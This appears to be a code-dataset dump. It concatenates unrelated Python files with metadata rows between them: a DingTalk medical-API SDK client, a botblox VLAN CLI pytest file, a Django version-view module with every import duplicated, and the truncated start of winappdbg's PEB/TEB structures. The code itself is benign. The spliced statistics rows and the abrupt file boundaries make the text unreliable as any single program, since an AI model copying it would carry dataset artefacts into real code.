return self.query_all_doctors_with_options(request, headers, runtime)
async def query_all_doctors_async(
self,
request: dingtalkindustry__1__0_models.QueryAllDoctorsRequest,
) -> dingtalkindustry__1__0_models.QueryAllDoctorsResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryAllDoctorsHeaders()
return await self.query_all_doctors_with_options_async(request, headers, runtime)
def query_all_doctors_with_options(
self,
request: dingtalkindustry__1__0_models.QueryAllDoctorsRequest,
headers: dingtalkindustry__1__0_models.QueryAllDoctorsHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllDoctorsResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.page_num):
query['pageNum'] = request.page_num
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryAllDoctorsResponse(),
self.do_roarequest('QueryAllDoctors', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/doctors', 'json', req, runtime)
)
async def query_all_doctors_with_options_async(
self,
request: dingtalkindustry__1__0_models.QueryAllDoctorsRequest,
headers: dingtalkindustry__1__0_models.QueryAllDoctorsHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllDoctorsResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.page_num):
query['pageNum'] = request.page_num
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryAllDoctorsResponse(),
await self.do_roarequest_async('QueryAllDoctors', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/doctors', 'json', req, runtime)
)
def query_user_ext_info(
self,
user_id: str,
) -> dingtalkindustry__1__0_models.QueryUserExtInfoResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryUserExtInfoHeaders()
return self.query_user_ext_info_with_options(user_id, headers, runtime)
async def query_user_ext_info_async(
self,
user_id: str,
) -> dingtalkindustry__1__0_models.QueryUserExtInfoResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryUserExtInfoHeaders()
return await self.query_user_ext_info_with_options_async(user_id, headers, runtime)
def query_user_ext_info_with_options(
self,
user_id: str,
headers: dingtalkindustry__1__0_models.QueryUserExtInfoHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryUserExtInfoResponse:
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryUserExtInfoResponse(),
self.do_roarequest('QueryUserExtInfo', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/users/{user_id}/extInfos', 'json', req, runtime)
)
async def query_user_ext_info_with_options_async(
self,
user_id: str,
headers: dingtalkindustry__1__0_models.QueryUserExtInfoHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryUserExtInfoResponse:
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryUserExtInfoResponse(),
await self.do_roarequest_async('QueryUserExtInfo', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/users/{user_id}/extInfos', 'json', req, runtime)
)
def query_job_code_dictionary(self) -> dingtalkindustry__1__0_models.QueryJobCodeDictionaryResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryJobCodeDictionaryHeaders()
return self.query_job_code_dictionary_with_options(headers, runtime)
async def query_job_code_dictionary_async(self) -> dingtalkindustry__1__0_models.QueryJobCodeDictionaryResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryJobCodeDictionaryHeaders()
return await self.query_job_code_dictionary_with_options_async(headers, runtime)
def query_job_code_dictionary_with_options(
self,
headers: dingtalkindustry__1__0_models.QueryJobCodeDictionaryHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryJobCodeDictionaryResponse:
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryJobCodeDictionaryResponse(),
self.do_roarequest('QueryJobCodeDictionary', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/jobCodes', 'json', req, runtime)
)
async def query_job_code_dictionary_with_options_async(
self,
headers: dingtalkindustry__1__0_models.QueryJobCodeDictionaryHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryJobCodeDictionaryResponse:
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryJobCodeDictionaryResponse(),
await self.do_roarequest_async('QueryJobCodeDictionary', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/jobCodes', 'json', req, runtime)
)
def query_all_department(
self,
request: dingtalkindustry__1__0_models.QueryAllDepartmentRequest,
) -> dingtalkindustry__1__0_models.QueryAllDepartmentResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryAllDepartmentHeaders()
return self.query_all_department_with_options(request, headers, runtime)
async def query_all_department_async(
self,
request: dingtalkindustry__1__0_models.QueryAllDepartmentRequest,
) -> dingtalkindustry__1__0_models.QueryAllDepartmentResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryAllDepartmentHeaders()
return await self.query_all_department_with_options_async(request, headers, runtime)
def query_all_department_with_options(
self,
request: dingtalkindustry__1__0_models.QueryAllDepartmentRequest,
headers: dingtalkindustry__1__0_models.QueryAllDepartmentHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllDepartmentResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryAllDepartmentResponse(),
self.do_roarequest('QueryAllDepartment', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/departments', 'json', req, runtime)
)
async def query_all_department_with_options_async(
self,
request: dingtalkindustry__1__0_models.QueryAllDepartmentRequest,
headers: dingtalkindustry__1__0_models.QueryAllDepartmentHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryAllDepartmentResponse:
UtilClient.validate_model(request)
query = {}
if not UtilClient.is_unset(request.page_size):
query['pageSize'] = request.page_size
if not UtilClient.is_unset(request.page_number):
query['pageNumber'] = request.page_number
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
query=OpenApiUtilClient.query(query)
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryAllDepartmentResponse(),
await self.do_roarequest_async('QueryAllDepartment', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/departments', 'json', req, runtime)
)
def query_group_info(
self,
group_id: str,
) -> dingtalkindustry__1__0_models.QueryGroupInfoResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryGroupInfoHeaders()
return self.query_group_info_with_options(group_id, headers, runtime)
async def query_group_info_async(
self,
group_id: str,
) -> dingtalkindustry__1__0_models.QueryGroupInfoResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkindustry__1__0_models.QueryGroupInfoHeaders()
return await self.query_group_info_with_options_async(group_id, headers, runtime)
def query_group_info_with_options(
self,
group_id: str,
headers: dingtalkindustry__1__0_models.QueryGroupInfoHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryGroupInfoResponse:
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryGroupInfoResponse(),
self.do_roarequest('QueryGroupInfo', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/groups/{group_id}', 'json', req, runtime)
)
async def query_group_info_with_options_async(
self,
group_id: str,
headers: dingtalkindustry__1__0_models.QueryGroupInfoHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkindustry__1__0_models.QueryGroupInfoResponse:
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers
)
return TeaCore.from_map(
dingtalkindustry__1__0_models.QueryGroupInfoResponse(),
await self.do_roarequest_async('QueryGroupInfo', 'industry_1.0', 'HTTP', 'GET', 'AK', f'/v1.0/industry/medicals/groups/{group_id}', 'json', req, runtime)
)
| 49.706294 | 183 | 0.711874 | 5,368 | 49,756 | 6.150708 | 0.034836 | 0.01369 | 0.105219 | 0.140291 | 0.976921 | 0.954993 | 0.934367 | 0.91671 | 0.896871 | 0.881152 | 0 | 0.013085 | 0.205885 | 49,756 | 1,000 | 184 | 49.756 | 0.822535 | 0.001608 | 0 | 0.77694 | 1 | 0 | 0.078732 | 0.047803 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03556 | false | 0 | 0.007543 | 0 | 0.113147 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
29c3fc61c5a1aa2e63b64a26766e19889f321bb7 | 7,018 | py | Python | tests/tagvlan/test_default_vlan.py | ararobotique/botblox-manager-software | 64c5c893601ea62a7ac414023455e8c2da04816d | [
"MIT"
] | 6 | 2021-04-18T21:30:17.000Z | 2022-01-13T06:37:43.000Z | tests/tagvlan/test_default_vlan.py | ararobotique/botblox-manager-software | 64c5c893601ea62a7ac414023455e8c2da04816d | [
"MIT"
] | 36 | 2020-12-16T12:29:24.000Z | 2021-09-18T14:52:25.000Z | tests/tagvlan/test_default_vlan.py | ararobotique/botblox-manager-software | 64c5c893601ea62a7ac414023455e8c2da04816d | [
"MIT"
] | 2 | 2021-04-08T20:27:48.000Z | 2021-08-30T17:32:28.000Z | from typing import AnyStr, List
from botblox_config.cli import create_parser
from pytest import CaptureFixture
from ..conftest import assert_ip175g_command_is_correct_type, get_data_from_cli_args, run_command_to_error
class TestSetGroups:
package: List[str] = ['botblox']
base_args: List[str] = [
'--device',
'test',
'tag-vlan',
]
def test_all_ports(self) -> None:
args = self.base_args + [
'--default-vlan',
'20',
]
data = get_data_from_cli_args(parser=create_parser(args), args=args)
assert_ip175g_command_is_correct_type(data=data)
expected_result = [
[23, 7, 20, 0], # VLAN_INFO_0
[23, 8, 20, 0], # VLAN_INFO_1
[23, 9, 20, 0], # VLAN_INFO_2
[23, 11, 20, 0], # VLAN_INFO_3
[23, 12, 20, 0], # VLAN_INFO_4
]
assert data == expected_result
def test_port_only(self) -> None:
args = self.base_args + [
'--port-default-vlan',
'2',
'20',
]
data = get_data_from_cli_args(parser=create_parser(args), args=args)
assert_ip175g_command_is_correct_type(data=data)
expected_result = [
[23, 8, 20, 0], # VLAN_INFO_1
]
assert data == expected_result
def test_mixed(self) -> None:
args = self.base_args + [
'--default-vlan',
'20',
'--port-default-vlan',
'2',
'21'
]
data = get_data_from_cli_args(parser=create_parser(args), args=args)
assert_ip175g_command_is_correct_type(data=data)
expected_result = [
[23, 7, 20, 0], # VLAN_INFO_0
[23, 8, 21, 0], # VLAN_INFO_1
[23, 9, 20, 0], # VLAN_INFO_2
[23, 11, 20, 0], # VLAN_INFO_3
[23, 12, 20, 0], # VLAN_INFO_4
]
assert data == expected_result
def test_all_ports_wrong_type(
self,
capfd: CaptureFixture,
) -> None:
test_args = self.base_args + [
'--default-vlan',
'WRONG',
]
run_command_to_error(self.package, test_args)
captured: CaptureFixture[AnyStr] = capfd.readouterr()
assert captured.out == ''
expected_stderr_message = "tag-vlan: error: argument -D/--default-vlan: invalid VLAN ID value: 'WRONG'"
actual_stderr: str = captured.err
assert actual_stderr.find(expected_stderr_message) > -1
def test_all_ports_wrong_num(
self,
capfd: CaptureFixture,
) -> None:
test_args = self.base_args + [
'--default-vlan',
'5000',
]
run_command_to_error(self.package, test_args)
captured: CaptureFixture[AnyStr] = capfd.readouterr()
assert captured.out == ''
expected_stderr_message = "tag-vlan: error: argument -D/--default-vlan: invalid VLAN ID value: '5000'"
actual_stderr: str = captured.err
assert actual_stderr.find(expected_stderr_message) > -1
def test_all_ports_missing_arg(
self,
capfd: CaptureFixture,
) -> None:
test_args = self.base_args + [
'--default-vlan',
]
run_command_to_error(self.package, test_args)
captured: CaptureFixture[AnyStr] = capfd.readouterr()
assert captured.out == ''
expected_stderr_message = "tag-vlan: error: argument -D/--default-vlan: expected one argument"
actual_stderr: str = captured.err
assert actual_stderr.find(expected_stderr_message) > -1
def test_port(self) -> None:
args = self.base_args + [
'--port-default-vlan',
'2',
'20',
]
data = get_data_from_cli_args(parser=create_parser(args), args=args)
assert_ip175g_command_is_correct_type(data=data)
expected_result = [
[23, 8, 20, 0], # VLAN_INFO_1
]
assert data == expected_result
def test_ports(self) -> None:
args = self.base_args + [
'--port-default-vlan',
'2',
'20',
'--port-default-vlan',
'1',
'21',
]
data = get_data_from_cli_args(parser=create_parser(args), args=args)
assert_ip175g_command_is_correct_type(data=data)
expected_result = [
[23, 7, 21, 0], # VLAN_INFO_0
[23, 8, 20, 0], # VLAN_INFO_1
]
assert data == expected_result
def test_port_wrong_port_type(
self,
capfd: CaptureFixture,
) -> None:
test_args = self.base_args + [
'--port-default-vlan',
'a',
'20',
]
run_command_to_error(self.package, test_args)
captured: CaptureFixture[AnyStr] = capfd.readouterr()
assert captured.out == ''
expected_stderr_message = 'tag-vlan: error: argument -d/--port-default-vlan: ' \
'Error in argument "port{1,2,3,4,5}": Invalid port \'a\''
actual_stderr: str = captured.err
assert actual_stderr.find(expected_stderr_message) > -1
def test_port_wrong_port_num(
self,
capfd: CaptureFixture,
) -> None:
test_args = self.base_args + [
'--port-default-vlan',
'6',
'20',
]
run_command_to_error(self.package, test_args)
captured: CaptureFixture[AnyStr] = capfd.readouterr()
assert captured.out == ''
expected_stderr_message = 'tag-vlan: error: argument -d/--port-default-vlan: ' \
'Error in argument "port{1,2,3,4,5}": Invalid port \'6\''
actual_stderr: str = captured.err
assert actual_stderr.find(expected_stderr_message) > -1
def test_port_missing_vlan_arg(
self,
capfd: CaptureFixture,
) -> None:
test_args = self.base_args + [
'--port-default-vlan',
'1',
]
run_command_to_error(self.package, test_args)
captured: CaptureFixture[AnyStr] = capfd.readouterr()
assert captured.out == ''
expected_stderr_message = "tag-vlan: error: argument -d/--port-default-vlan: expected 2 arguments"
actual_stderr: str = captured.err
assert actual_stderr.find(expected_stderr_message) > -1
def test_port_missing_both_args(
self,
capfd: CaptureFixture,
) -> None:
test_args = self.base_args + [
'--port-default-vlan',
]
run_command_to_error(self.package, test_args)
captured: CaptureFixture[AnyStr] = capfd.readouterr()
assert captured.out == ''
expected_stderr_message = "tag-vlan: error: argument -d/--port-default-vlan: expected 2 arguments"
actual_stderr: str = captured.err
assert actual_stderr.find(expected_stderr_message) > -1
| 29.364017 | 111 | 0.565831 | 804 | 7,018 | 4.656716 | 0.105721 | 0.061699 | 0.033654 | 0.051282 | 0.915598 | 0.901175 | 0.892628 | 0.887821 | 0.887821 | 0.86859 | 0 | 0.036299 | 0.320889 | 7,018 | 238 | 112 | 29.487395 | 0.749266 | 0.023796 | 0 | 0.711957 | 0 | 0.01087 | 0.125805 | 0.013458 | 0 | 0 | 0 | 0 | 0.13587 | 1 | 0.065217 | false | 0 | 0.021739 | 0 | 0.103261 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
29cbd1d2ed653ec831d3123d61fda699495e7080 | 5,891 | py | Python | AutotestWebD/apps/version_manage/views/version_show.py | yangjourney/sosotest | 2e88099a829749910ca325253c9b1a2e368d21a0 | [
"MIT"
] | 422 | 2019-08-18T05:04:20.000Z | 2022-03-31T06:49:19.000Z | AutotestWebD/apps/version_manage/views/version_show.py | LinSongJian1985/sosotest | 091863dee531b5726650bb63efd6f169267cbeb4 | [
"MIT"
] | 10 | 2019-10-24T09:55:38.000Z | 2021-09-29T17:28:43.000Z | AutotestWebD/apps/version_manage/views/version_show.py | LinSongJian1985/sosotest | 091863dee531b5726650bb63efd6f169267cbeb4 | [
"MIT"
] | 202 | 2019-08-18T05:04:27.000Z | 2022-03-30T05:57:18.000Z | from django.shortcuts import render,HttpResponse
from urllib import parse
from apps.interface.services.HTTP_interfaceService import HTTP_interfaceService
from apps.common.config import commonWebConfig
from apps.common.func.CommonFunc import *
from apps.common.func.LanguageFunc import *
from apps.config.services.businessLineService import BusinessService
from apps.config.services.modulesService import ModulesService
from apps.config.services.sourceService import SourceService
from apps.config.services.uriService import UriService
from apps.config.services.serviceConfService import ServiceConfService
from apps.config.services.http_confService import HttpConfService
from apps.config.views.http_conf import getDebugBtn
from apps.common.helper.ApiReturn import ApiReturn
from apps.common.func.WebFunc import *
from AutotestWebD.settings import isRelease
import json,traceback
from django.shortcuts import render,HttpResponse
from urllib import parse
from apps.interface.services.HTTP_interfaceService import HTTP_interfaceService
from apps.common.config import commonWebConfig
from apps.common.func.CommonFunc import *
from apps.common.func.LanguageFunc import *
from apps.config.services.businessLineService import BusinessService
from apps.config.services.modulesService import ModulesService
from apps.config.services.sourceService import SourceService
from apps.config.services.uriService import UriService
from apps.config.services.serviceConfService import ServiceConfService
from apps.config.services.http_confService import HttpConfService
from apps.config.views.http_conf import getDebugBtn
from apps.common.helper.ApiReturn import ApiReturn
from apps.common.func.WebFunc import *
from AutotestWebD.settings import isRelease
import json,traceback
from all_models.models.A0011_version_manage import *
from apps.version_manage.services.common_service import VersionService
retmsg = ""
logger = logging.getLogger("web")
def current_version(request):
langDict = getLangTextDict(request)
context = {}
if not isRelease:
context["env"] = "test"
context["current_version"] = "current-page"
context["userName"] = request.session.get("userName")
#文本
text = {}
text["pageTitle"] = "当前版本信息查看"#langDict["web"]["httpInterfacePageHeadings_check"]
context["text"] = text
versionObj = TbVersion.objects.filter(type=2)
context["versionName"] = "没有找到版本"
context["versionDesc"] = "没有找到版本"
context["closeTime"] = "None"
if versionObj:
context["versionName"] = versionObj[0].versionName
context["versionDesc"] = versionObj[0].versionDesc
context["closeTime"] = versionObj[0].closeTime
return render(request,"InterfaceTest/version_manage/current_version.html",context)
def history_version(request):
langDict = getLangTextDict(request)
context = {}
if not isRelease:
context["env"] = "test"
context["history_version"] = "current-page"
context["userName"] = request.session.get("userName")
# 文本
text = {}
text["pageTitle"] = "历史版本信息查看" # langDict["web"]["httpInterfacePageHeadings_check"]
context["text"] = text
versionObj = TbVersion.objects.filter(type=1).order_by("-closeTime")
context["versionList"] = []
for tmpVersion in versionObj:
tmpVersionInfo = {}
tmpVersionInfo['versionName'] = tmpVersion.versionName
tmpVersionInfo['versionDesc'] = tmpVersion.versionDesc
tmpVersionInfo['closeTime'] = tmpVersion.closeTime
context["versionList"].append(tmpVersionInfo)
return render(request, "InterfaceTest/version_manage/history_version.html", context)
def change_version(request):
langDict = getLangTextDict(request)
context = {}
if not isRelease:
context["env"] = "test"
versionName = request.GET.get("version","CurrentVersion")
versionHistorySets = TbVersion.objects.filter(type=1).order_by("-closeTime")
isVersionExist = False
for tmpVersion in versionHistorySets:
if tmpVersion.versionName == versionName:
isVersionExist = True
VersionService.setLastVersionSession(request)
if versionName == "CurrentVersion" or isVersionExist == False:
VersionService.setToCurrentVersion(request)
context["current_version"] = "current-page"
context["userName"] = request.session.get("userName")
# 文本
text = {}
text["pageTitle"] = "当前版本信息查看" # langDict["web"]["httpInterfacePageHeadings_check"]
context["text"] = text
versionObj = TbVersion.objects.filter(type=2)
context["versionName"] = "没有找到版本"
context["versionDesc"] = "没有找到版本"
context["closeTime"] = "没有封板时间"
if versionObj:
context["versionName"] = versionObj[0].versionName
context["versionDesc"] = versionObj[0].versionDesc
context["closeTime"] = versionObj[0].closeTime
templatePath = "InterfaceTest/version_manage/current_version.html"
else:
VersionService.setToHistoryVersion(request,versionName)
context["history_version"] = "current-page"
context["userName"] = request.session.get("userName")
# 文本
text = {}
text["pageTitle"] = "历史版本信息查看" # langDict["web"]["httpInterfacePageHeadings_check"]
context["text"] = text
versionObj = TbVersion.objects.filter(type=1).order_by("-closeTime")
context["versionList"] = []
for tmpVersion in versionObj:
tmpVersionInfo = {}
tmpVersionInfo['versionName'] = tmpVersion.versionName
tmpVersionInfo['versionDesc'] = tmpVersion.versionDesc
tmpVersionInfo['closeTime'] = tmpVersion.closeTime
context["versionList"].append(tmpVersionInfo)
templatePath = "InterfaceTest/version_manage/history_version.html"
return render(request,templatePath , context) | 40.909722 | 92 | 0.730606 | 585 | 5,891 | 7.297436 | 0.186325 | 0.050597 | 0.045912 | 0.061841 | 0.859686 | 0.859686 | 0.809557 | 0.809557 | 0.799485 | 0.799485 | 0 | 0.003051 | 0.165337 | 5,891 | 144 | 93 | 40.909722 | 0.865162 | 0.036327 | 0 | 0.793388 | 0 | 0 | 0.141975 | 0.034568 | 0 | 0 | 0 | 0 | 0 | 1 | 0.024793 | false | 0 | 0.297521 | 0 | 0.347107 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d9ac27be21d1481a3d04e285798e9563064df860 | 162,665 | py | Python | home/vscode/extensions/ms-python.python-2021.12.1559732655/pythonFiles/lib/python/debugpy/_vendored/pydevd/pydevd_attach_to_process/winappdbg/win32/peb_teb.py | qwertzy-antonio-godinho/dots | 65cd657f785e7da3a3ccb1a808c0fc1b8496e5b1 | [
"Apache-2.0"
] | 6 | 2021-12-26T13:34:32.000Z | 2022-02-08T22:09:38.000Z | src/ptvsd/_vendored/pydevd/pydevd_attach_to_process/winappdbg/win32/peb_teb.py | ev3dev/ptvsd | cea22767dd78a812a14e2330a540a368f615224e | [
"MIT"
] | 12 | 2015-10-30T19:20:28.000Z | 2021-04-23T15:59:58.000Z | src/ptvsd/_vendored/pydevd/pydevd_attach_to_process/winappdbg/win32/peb_teb.py | ev3dev/ptvsd | cea22767dd78a812a14e2330a540a368f615224e | [
"MIT"
] | 5 | 2015-09-16T07:50:06.000Z | 2019-09-09T14:33:46.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2009-2014, Mario Vilas
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice,this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
PEB and TEB structures, constants and data types.
"""
__revision__ = "$Id$"
from winappdbg.win32.defines import *
from winappdbg.win32.version import os
#==============================================================================
# This is used later on to calculate the list of exported symbols.
_all = None
_all = set(vars().keys())
#==============================================================================
#--- PEB and TEB structures, constants and data types -------------------------
# From http://www.nirsoft.net/kernel_struct/vista/CLIENT_ID.html
#
# typedef struct _CLIENT_ID
# {
# PVOID UniqueProcess;
# PVOID UniqueThread;
# } CLIENT_ID, *PCLIENT_ID;
class CLIENT_ID(Structure):
_fields_ = [
("UniqueProcess", PVOID),
("UniqueThread", PVOID),
]
# From MSDN:
#
# typedef struct _LDR_DATA_TABLE_ENTRY {
# BYTE Reserved1[2];
# LIST_ENTRY InMemoryOrderLinks;
# PVOID Reserved2[2];
# PVOID DllBase;
# PVOID EntryPoint;
# PVOID Reserved3;
# UNICODE_STRING FullDllName;
# BYTE Reserved4[8];
# PVOID Reserved5[3];
# union {
# ULONG CheckSum;
# PVOID Reserved6;
# };
# ULONG TimeDateStamp;
# } LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
##class LDR_DATA_TABLE_ENTRY(Structure):
## _fields_ = [
## ("Reserved1", BYTE * 2),
## ("InMemoryOrderLinks", LIST_ENTRY),
## ("Reserved2", PVOID * 2),
## ("DllBase", PVOID),
## ("EntryPoint", PVOID),
## ("Reserved3", PVOID),
## ("FullDllName", UNICODE_STRING),
## ("Reserved4", BYTE * 8),
## ("Reserved5", PVOID * 3),
## ("CheckSum", ULONG),
## ("TimeDateStamp", ULONG),
##]
# From MSDN:
#
# typedef struct _PEB_LDR_DATA {
# BYTE Reserved1[8];
# PVOID Reserved2[3];
# LIST_ENTRY InMemoryOrderModuleList;
# } PEB_LDR_DATA,
# *PPEB_LDR_DATA;
##class PEB_LDR_DATA(Structure):
## _fields_ = [
## ("Reserved1", BYTE),
## ("Reserved2", PVOID),
## ("InMemoryOrderModuleList", LIST_ENTRY),
##]
# From http://undocumented.ntinternals.net/UserMode/Structures/RTL_USER_PROCESS_PARAMETERS.html
# typedef struct _RTL_USER_PROCESS_PARAMETERS {
# ULONG MaximumLength;
# ULONG Length;
# ULONG Flags;
# ULONG DebugFlags;
# PVOID ConsoleHandle;
# ULONG ConsoleFlags;
# HANDLE StdInputHandle;
# HANDLE StdOutputHandle;
# HANDLE StdErrorHandle;
# UNICODE_STRING CurrentDirectoryPath;
# HANDLE CurrentDirectoryHandle;
# UNICODE_STRING DllPath;
# UNICODE_STRING ImagePathName;
# UNICODE_STRING CommandLine;
# PVOID Environment;
# ULONG StartingPositionLeft;
# ULONG StartingPositionTop;
# ULONG Width;
# ULONG Height;
# ULONG CharWidth;
# ULONG CharHeight;
# ULONG ConsoleTextAttributes;
